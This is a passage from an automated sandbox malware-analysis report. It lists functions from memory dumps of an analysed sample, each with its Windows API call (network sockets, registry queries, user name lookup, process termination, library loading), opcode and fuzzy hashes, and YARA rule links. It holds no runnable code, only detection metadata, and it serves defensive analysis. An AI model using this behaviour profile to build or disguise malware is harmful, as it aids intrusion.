APIs

GetFileType.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05490D71

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 4adf814007be8f360c4e1d396f02aa359cb29ded9a86afc1281ed13fb4aaf13d
Instruction ID: 74bfd2d2e54238dfda869ce434cedac67b110b47458fbc3b50437ec7dc831c5d
Opcode Fuzzy Hash: 4adf814007be8f360c4e1d396f02aa359cb29ded9a86afc1281ed13fb4aaf13d
Instruction Fuzzy Hash: 5F21A4755093C06FE7128B25CC45F52BFB8EF46310F0885DBE9849F193C264A848C772

Uniqueness

Uniqueness Score: -1.00%

Function 05492C62, Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05492CE6

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: e934efca1c4d516b45d7aa7681fc4186dda781ac9ea84e59d060d451747d9300
Instruction ID: 33e9b1e8186722afc4079409ebf1a7921c3c54b498486c74facc5e4cbaa4375b
Opcode Fuzzy Hash: e934efca1c4d516b45d7aa7681fc4186dda781ac9ea84e59d060d451747d9300
Instruction Fuzzy Hash: 8E21BD75409380AFEB22CF61CC85A92BFF4FF06210F0984DEE9858F563D271A809DB61

Uniqueness

Uniqueness Score: -1.00%

Function 05490B86, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05490BF8

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: c67eed9c1efe5061b4b410e40ecace496cb7cd4ad338424d9f720c35ddb01ee3
Instruction ID: 5693da2ec17572207e62928420c9fc65954c01d3f56db00a939bd820e6196b86
Opcode Fuzzy Hash: c67eed9c1efe5061b4b410e40ecace496cb7cd4ad338424d9f720c35ddb01ee3
Instruction Fuzzy Hash: 3D2193B1500304AFEB21CF55DC49FA7BBECEF04710F0484AAED499B241D674E405CA71

Uniqueness

Uniqueness Score: -1.00%

Function 0233ACBA, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 0233AD34

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1e98cc1961159b6e435b743d4bdad17bb0608612eb2f2898183f2ed9c82308ff
Instruction ID: a20d27b0c464a53c728c0c80da4208d9524d38400ae9aa4aa2a59c842044b74b
Opcode Fuzzy Hash: 1e98cc1961159b6e435b743d4bdad17bb0608612eb2f2898183f2ed9c82308ff
Instruction Fuzzy Hash: 53218EB5600304AFE722CF15CC85F66BBECEF04711F04846AE985CB656DB64E948CA71

Uniqueness

Uniqueness Score: -1.00%

Function 0233ADA3, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E94,?,?), ref: 0233AE26

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 6356f45217b22e920cd13199bacebba204be58ebe999257068b63a9825e1b184
Instruction ID: 409eeecdb71450d31e1da7964ec107c8402091c7bb2ca2614b2c9774934ac7c7
Opcode Fuzzy Hash: 6356f45217b22e920cd13199bacebba204be58ebe999257068b63a9825e1b184
Instruction Fuzzy Hash: DD21E7B15483806FD312CB26CC41F72BFB8EF87620F0981CBED848B652D220A915C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 05491E52, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 05491EBD

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 5c1e1240257dfeae7b429740dbc789498d67e04c75c0fb7de14b4e233d770da0
Instruction ID: d2199366893db84b3f574881e26aac2fb957a1c3d83061422fb8efadfe39af92
Opcode Fuzzy Hash: 5c1e1240257dfeae7b429740dbc789498d67e04c75c0fb7de14b4e233d770da0
Instruction Fuzzy Hash: FF219DB1604340AFEB21CF29DD46FA6FBA8EF04320F0484AEED458B685D375E805CA75

Uniqueness

Uniqueness Score: -1.00%

Function 0233B27C, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,057ECA00,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 0233B2E8

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 973c0b33a76c68b513623a159219cb52699142e991e1366157a6e2a861d12ca2
Instruction ID: 7e4dfba2963fb579a2fa65a0796bd7cd82fe4f2211a309ad6c72ecba93bd3c00
Opcode Fuzzy Hash: 973c0b33a76c68b513623a159219cb52699142e991e1366157a6e2a861d12ca2
Instruction Fuzzy Hash: BC2181B25093C05FEB138B25DD55792BFB4AF07624F0984DAECC58F663D274A908C762

Uniqueness

Uniqueness Score: -1.00%

Function 0233AEE3, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,057ECA00,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 0233AF50

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 8e1bcf588ebcc0e12b4ec7a66b46302f09f73dcfe037e56d43f2053c775ed50a
Instruction ID: b02df8e54cc3367dc2db7f43364c2bfcd63820693a993588082f238442ab6b43
Opcode Fuzzy Hash: 8e1bcf588ebcc0e12b4ec7a66b46302f09f73dcfe037e56d43f2053c775ed50a
Instruction Fuzzy Hash: C5216DB640E3C09FEB138B259C91792BFB4DF07224F0984DBEC858F553D2659948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0233A140, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 0233A1C1

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 5a164ddbf97e361e3280c92bb307c250f0a0df2623c1a9dbcb7895de04701df3
Instruction ID: fca7dacc82fbfa37fd5130927ee733f32ad65d30d170310719cb493c49925190
Opcode Fuzzy Hash: 5a164ddbf97e361e3280c92bb307c250f0a0df2623c1a9dbcb7895de04701df3
Instruction Fuzzy Hash: 8C219A7540D3C09FD7238B218C55A52BFB4EF07220F0A85DBD9848F1A3C278A809CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05492E4A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05492EAE

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: b7e10dacc186178d2e3c5811aa7b65e45b2c4f62d6e3b59e6a63fc16752df28c
Instruction ID: 2dcd786760a7c7927df5f26b41b48fc579315ee4ff26d45e4554ed54e66ae19a
Opcode Fuzzy Hash: b7e10dacc186178d2e3c5811aa7b65e45b2c4f62d6e3b59e6a63fc16752df28c
Instruction Fuzzy Hash: E211B4B5604304AFEB21CF59DC85FA6BBA8EF04320F04846BED45CB641D7B4E404CA71

Uniqueness

Uniqueness Score: -1.00%

Function 05491F52, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 05491FC6

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: af7bf38a15573395f847e52569555604e50fd19d2afe787f1647038b202a6485
Instruction ID: 061eecd07bcb1ff3643fe3b31810eef01a312ac4efaf5ddfbb6c762c2e3a2837
Opcode Fuzzy Hash: af7bf38a15573395f847e52569555604e50fd19d2afe787f1647038b202a6485
Instruction Fuzzy Hash: B321CDB1500344AFEB21CF55CD46FA6FBE8EF08320F04845AEA858B245D375E509CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0549189A, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 05491906

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 2761d8915192811eca82e363eb434da0ad3a0aa21a2f9d2eec233f4ce4e2b0dd
Instruction ID: 2597c50640fabf449fbb61afd254796dc2ade5d93162b54650556bfb06891ccb
Opcode Fuzzy Hash: 2761d8915192811eca82e363eb434da0ad3a0aa21a2f9d2eec233f4ce4e2b0dd
Instruction Fuzzy Hash: 8721CDB1500340AFEB21CF65DC45FA6FFE9EF08320F04886AEE858A641D375A404CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05491BB6, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05491C28

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1b162da81f610b6c3cf887f85e169b9f8b53bdc54878bc7008927d4955d04814
Instruction ID: c74653831e8055f5f6ff8f4fea1863c12caf2d808eaaa8df7d820db2ff27b37d
Opcode Fuzzy Hash: 1b162da81f610b6c3cf887f85e169b9f8b53bdc54878bc7008927d4955d04814
Instruction Fuzzy Hash: 3F117FB1604304AFEB21CE15CD46FA7FBA8EF04720F04849AE9469B651D674E405CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 054923CE, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 0549242D

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 71b8936c0e598c41b7ed8ce15c4f3a9431ab911aae94ffa16c7faa03dc575af9
Instruction ID: 38b9b756a4a57bdbf219a2c5e4468db3986d253e48be0e24087bde31089ff41f
Opcode Fuzzy Hash: 71b8936c0e598c41b7ed8ce15c4f3a9431ab911aae94ffa16c7faa03dc575af9
Instruction Fuzzy Hash: 2E11B2B6504300AFEB21CF65DC46FA6FBA8EF44720F04846AED458B655D674E404DB71

Uniqueness

Uniqueness Score: -1.00%

Function 054916A0, Relevance: 1.6, APIs: 1, Instructions: 64networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05491718

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: e75b14567cab7fd30ccf445315c7759f3c1a3693a8d0e1eab51507177780a447
Instruction ID: 2be6845a031bd69caba8b1b87de36f73e6f966b1451f5e69443d62c742c8455d
Opcode Fuzzy Hash: e75b14567cab7fd30ccf445315c7759f3c1a3693a8d0e1eab51507177780a447
Instruction Fuzzy Hash: 331196755093846FE722CF15DC45F56FFA8EF45720F0884DAE9449B192C264A948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05492D62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05492DBE

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 2245c9aeec8168df084308651529bc4f8eeeaea8be1f98917c95121236307508
Instruction ID: 0391b20357cceec26cea645caa49ed5f0bebd12becb2e48872366f1330b85ca2
Opcode Fuzzy Hash: 2245c9aeec8168df084308651529bc4f8eeeaea8be1f98917c95121236307508
Instruction Fuzzy Hash: AC11E2B1504300AFEB21CF69DC86FA6BBA8EF44320F04846AED458B641D2B4E404CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 05492AE2, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05492B46

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 75b4d6999ab98cb94e134547b28ba019b4d01b5804c1f438d50bd1cb566f8b97
Instruction ID: d2aeab9c3a3f84fd0ef091fd39bb7b3c3c72d5a1239ef56cf51315e824ca5715
Opcode Fuzzy Hash: 75b4d6999ab98cb94e134547b28ba019b4d01b5804c1f438d50bd1cb566f8b97
Instruction Fuzzy Hash: B1118EB5504344AFEB21CF65DC85FAABBACEF04320F04846BE9499B245D674E5048BB1

Uniqueness

Uniqueness Score: -1.00%

Function 05493BFA, Relevance: 1.6, APIs: 1, Instructions: 63encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05493C56

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: c9031e4b7f13cb58559bcea80de75951fc385b16f88d8017253eb2a0f89bf927
Instruction ID: dc8fd6e5a579d074e483f4abfce19e928f5503dc0ef575ce6a7df0bb9f7ca730
Opcode Fuzzy Hash: c9031e4b7f13cb58559bcea80de75951fc385b16f88d8017253eb2a0f89bf927
Instruction Fuzzy Hash: EC11B6B2500700AFEB21CF65DD45FA6FBA8EF45720F14886BED458B245D674E404CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0233B502, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 0233B558

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 108ed01a9b404ea1d576b4ed767fefd374ad10e0131a6d2a622c945864ed6cdb
Instruction ID: a25e1f78a4ec1fd31b451ada98df3af6e37c4209af95ca1dabc6c2d470ba5fcd
Opcode Fuzzy Hash: 108ed01a9b404ea1d576b4ed767fefd374ad10e0131a6d2a622c945864ed6cdb
Instruction Fuzzy Hash: 031191B2600304AFFB22CF29DC85B66FB9CDF44724F14846AED459B646D674E904CA71

Uniqueness

Uniqueness Score: -1.00%

Function 0233AAC7, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0233AB32

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0fa09df83a3c019d767779a48551ef902744d61be7c9adcef471b243148de55d
Instruction ID: 3b54e531aeebe70b406cb62e81ce7159bf091bf8092c1900c780ea5297313630
Opcode Fuzzy Hash: 0fa09df83a3c019d767779a48551ef902744d61be7c9adcef471b243148de55d
Instruction Fuzzy Hash: 9D11B172409780AFDB238F55DC44B62FFF4EF4A210F0884DAED858B162C375A818DB61

Uniqueness

Uniqueness Score: -1.00%

Function 05490DDE, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05490E3D

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 901b909a1d071a193c9766749038f27bef7b01627d4053b7107538e56b6a0892
Instruction ID: 787bc06175c8d36bfc9c43b8aa5396f47e179a79a40f681f12f6ede1d49fc7de
Opcode Fuzzy Hash: 901b909a1d071a193c9766749038f27bef7b01627d4053b7107538e56b6a0892
Instruction Fuzzy Hash: 45119DB1500300AFEB21CF55DC45FA6BBA8EF04720F0488AAE9499A255D274A404CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0233A4DA, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,00000E94,?,?), ref: 0233A552

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 41426dffcc126b82b609e5fff7ca50d5190627bc450251f36bd689ac3a4e53dc
Instruction ID: 017f480da5429451261e6f8960b54d40cb1962a8835260886b57b7abeef453ba
Opcode Fuzzy Hash: 41426dffcc126b82b609e5fff7ca50d5190627bc450251f36bd689ac3a4e53dc
Instruction Fuzzy Hash: EA11C4715093806FD321CB25CC45F66FFB8EF86620F08819BED488B692D224B915CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05493CE2, Relevance: 1.6, APIs: 1, Instructions: 59encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05493D3E

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: f7e1d180ec8f64cda638eb7f0a9ec3d75b75082eb8539ef5ddcd16a6a92a60fc
Instruction ID: ac3528fda1dd862c4dd5462ce3ba51d7d80f3ae427d012ae4c4ac82c05bcbcd3
Opcode Fuzzy Hash: f7e1d180ec8f64cda638eb7f0a9ec3d75b75082eb8539ef5ddcd16a6a92a60fc
Instruction Fuzzy Hash: 5E11BFB1500340AFEB21CF55DC85FA6FBA8EF45720F0489AAED459A245D274A809CA72

Uniqueness

Uniqueness Score: -1.00%

Function 05492826, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 0549287F

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 33336e12b04b9a7e0e85add3814b2190bcc4c0e21eb1603dc9ac71eb90c81563
Instruction ID: 27b6665a41baab593367105170a9fd0b771a3c6cad2784dd1817b3cbbcab8226
Opcode Fuzzy Hash: 33336e12b04b9a7e0e85add3814b2190bcc4c0e21eb1603dc9ac71eb90c81563
Instruction Fuzzy Hash: 6E11A3B5504304AFEB21CF55DC85FA6FBA8EF44720F1484ABED499B245D274E405CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 05492BC6, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05492C25

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 14fb937b7cd9a324e101928be70637bc15074ebe9b58a6aa3a56d69883b3e70f
Instruction ID: d129ed388b612fc6a3a1fbd88865d151859bfb11cce927e3819cffc58c0ec585
Opcode Fuzzy Hash: 14fb937b7cd9a324e101928be70637bc15074ebe9b58a6aa3a56d69883b3e70f
Instruction Fuzzy Hash: 0D11E075104304AFEB31CF15CC82FA6FFA8EF04720F04849AEE455A256D2B4E409CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 054901D6, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E94), ref: 0549023F

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da612787145423321427468f6785e59a60d6119b8680333c063c0f4daab36cf8
Instruction ID: f861e155c2990c41d0acca11794173bbf70d89eb3a7257c1e4f07e7dcece03f5
Opcode Fuzzy Hash: da612787145423321427468f6785e59a60d6119b8680333c063c0f4daab36cf8
Instruction Fuzzy Hash: FE11E571600300AFFB25DF15DC46FB6FF98EF04720F14849AED495A285D2B4B945CA76

Uniqueness

Uniqueness Score: -1.00%

Function 05491390, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,057ECA00,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 054913E4

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 03270ee18eef6bc3174dabd63aba8a9aa058cf102e32450e4e858f1dea83afce
Instruction ID: 9ea12b2351c79c640861636cbf11f1aa46dc2f4afb36bcf0f31dd9e1669597ff
Opcode Fuzzy Hash: 03270ee18eef6bc3174dabd63aba8a9aa058cf102e32450e4e858f1dea83afce
Instruction Fuzzy Hash: 3011A7B15093809FDB12CF25DC85B52BFA4EF06224F0884EBED858F652D274A848CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0233A20C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,057ECA00,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 0233A26C

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 726255074a33bdf0740ab07582c35ba531bc810bad0f4504a3bda30a65ca39bb
Instruction ID: cef7b2854205a6b8319c0aac4aaadce37db0a4dfe822e6554fb7fb317f75064d
Opcode Fuzzy Hash: 726255074a33bdf0740ab07582c35ba531bc810bad0f4504a3bda30a65ca39bb
Instruction Fuzzy Hash: A4116D714093C09FE7128B25DC55B62BFB4EF47614F0880DAEDC58F263D265A908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 05490C52, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(?,057ECA00,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 05490CB0

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9c5f8fa54d9d74895a25eb470ad804226d5e1e481c5738e872e94c5b0bcb41fe
Instruction ID: d006d0d9c4996218789974adf2f37cb0c186a6a6c877424dae4a53d157db96a6
Opcode Fuzzy Hash: 9c5f8fa54d9d74895a25eb470ad804226d5e1e481c5738e872e94c5b0bcb41fe
Instruction Fuzzy Hash: 131191755497809FDB168B25DC85B52BFF4EF06220F0C84DAED898F262C275A848DB61

Uniqueness

Uniqueness Score: -1.00%

Function 054916C2, Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05491718

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: d726330c9c0098adedf482d641739f00c1a54ebea48f4eba5c0e8d90e43670c7
Instruction ID: 0b2c4088186b0e3f117c633519d45cb230a42d824169223e5e94ba3f127f50a9
Opcode Fuzzy Hash: d726330c9c0098adedf482d641739f00c1a54ebea48f4eba5c0e8d90e43670c7
Instruction Fuzzy Hash: 8E01D675500305AFEB21CF15DD86FA6FF98EF04720F1484AAED459B286D674E405CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0233AFCA, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0233B012

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 1c3a6b427fea3ebb76d1fbd4ec53491d56d85f098acad9fdda1efba018da2777
Instruction ID: 3994798725e1e454b51fa72311a0c452697762e57c58336cbdd0e51ac3e690f0
Opcode Fuzzy Hash: 1c3a6b427fea3ebb76d1fbd4ec53491d56d85f098acad9fdda1efba018da2777
Instruction Fuzzy Hash: FD11A1B26003408FEB61CF2ADC85B56FBD8EF04224F08846ADD59CB646E774E944CA71

Uniqueness

Uniqueness Score: -1.00%

Function 05490D1E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05490D71

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 8fe2303897f6a1ca9d41dce6f5b3cb2d05b582d8920a0e931ad8dadee02a2c21
Instruction ID: 2026941bec6f0391025ddf79d26a4a7f679637694ce19aff6c0e757e44a6dd23
Opcode Fuzzy Hash: 8fe2303897f6a1ca9d41dce6f5b3cb2d05b582d8920a0e931ad8dadee02a2c21
Instruction Fuzzy Hash: DA01D2B5500704AEEB21CF15DC8AFA6FF98EF44720F14849AED499B246D278F444CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 05492C9A, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05492CE6

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 6680cddfb71d117c5babbdc8a597454bc8d506e19f5d97aa494c4795d70d1bda
Instruction ID: 7e4421bd8f68d4866b8a9b9ca3a9a4c3c97a4dc6a4cf1bc8ba411763b8b4ba20
Opcode Fuzzy Hash: 6680cddfb71d117c5babbdc8a597454bc8d506e19f5d97aa494c4795d70d1bda
Instruction Fuzzy Hash: 07117075504300AFDB21CF55D845BA2FFE5FF04310F0885AADD458B616D375E414DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05492A3A, Relevance: 1.5, APIs: 1, Instructions: 47encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateChain.CRYPT32(?,00000E94,?,?), ref: 05492A8A

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: ccdca1b321e9949a35fc381bd9e8491d79c8f4c08aec5d62d7a5c25429dec7de
Instruction ID: 013f556519a2b5fbd185171dee703df65ee8a77bf6e890145e8049d66c83fc3a
Opcode Fuzzy Hash: ccdca1b321e9949a35fc381bd9e8491d79c8f4c08aec5d62d7a5c25429dec7de
Instruction Fuzzy Hash: E201B1B1500600ABD310DF1ADC82B26FBA8EB88B20F14812AED088B641D231B916CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0233A0BE, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E94,?,?), ref: 0233A10E

Memory Dump Source

